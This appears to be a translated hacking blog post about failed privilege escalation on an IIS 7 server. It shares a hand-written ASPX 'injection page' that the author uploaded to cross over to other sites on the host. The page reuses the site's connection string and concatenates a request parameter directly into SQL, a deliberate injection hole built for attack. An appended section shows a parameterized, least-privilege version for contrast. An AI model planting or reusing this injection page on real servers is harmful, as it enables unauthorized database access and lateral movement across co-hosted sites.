Yesterday 4z1 and I looked at a site; privilege escalation was very hard to pull off. We spent a full 5 hours on it with no result. 2008 + IIS 7, no sa, no root, none of the usual services...!
Along the way we used a hand-built ASPX injection page to cross over to other sites; I found a pile of code online and not one piece of it worked.
It's not much code, so I just wrote one myself. So annoying.

<%@ Page Language="C#" AutoEventWireup="true" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    <script language="c#" runat="server">
        void page_init(object sender, EventArgs e)
        {
            System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            // reuse the site's own connection string from web.config ("连接名" is the name of the entry)
            conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
            conn.Open();

            string i = this.Page.Request.Params["xxser"]; // the parameter is passed as ?xxser=1
            // the parameter is concatenated straight into the SQL text; that is the whole point of this page
            System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
            // ExecuteNonQuery returns -1 for a SELECT, so x only shows whether the statement ran
            int x = command.ExecuteNonQuery();
            Response.Write(i + "\n");
            Response.Write(x);
            conn.Close();
        }
    </script>
    </div>
    </form>
</body>
</html>
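For contrast, here is the same lookup written so that the request parameter can never reach the SQL parser as code. This is an added example, not code from the original post: it keeps the `xxser` parameter name but assumes a connection string entry named `MainDb` in web.config and a table `Items` with an integer column `Id`, all of which are placeholders.

```csharp
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<script runat="server">
    // Hardened variant of the page above (added example, not from the original post).
    // "MainDb", "Items" and "Id" are assumed placeholder names.
    void Page_Init(object sender, EventArgs e)
    {
        // 1. Validate the shape of the input before it goes anywhere near the database.
        string raw = Request.QueryString["xxser"];
        int id;
        if (!int.TryParse(raw, out id))
        {
            Response.StatusCode = 400;
            Response.Write("xxser must be an integer");
            return;
        }

        string cs = ConfigurationManager.ConnectionStrings["MainDb"].ConnectionString;

        // 2. Bind the value as a typed parameter: the SQL text is a constant, the
        //    value travels separately, so "1; exec ..." style input is just a failed parse.
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand(
            "SELECT COUNT(*) FROM [Items] WHERE [Id] = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            int count = (int)cmd.ExecuteScalar();

            // 3. Encode anything echoed back so the page is not an XSS sink either.
            Response.Write(HttpUtility.HtmlEncode(raw) + "\n" + count);
        }
    }
</script>
```

Parameterization closes the concatenation hole, but it does not change what the login behind the connection string is allowed to do; the post's approach works precisely because every right that login holds becomes reachable through the page. Keeping that login at the minimum the application needs (no server roles, no command execution procedures, no access to other sites' databases) is what limits the damage when any page on the host is compromised.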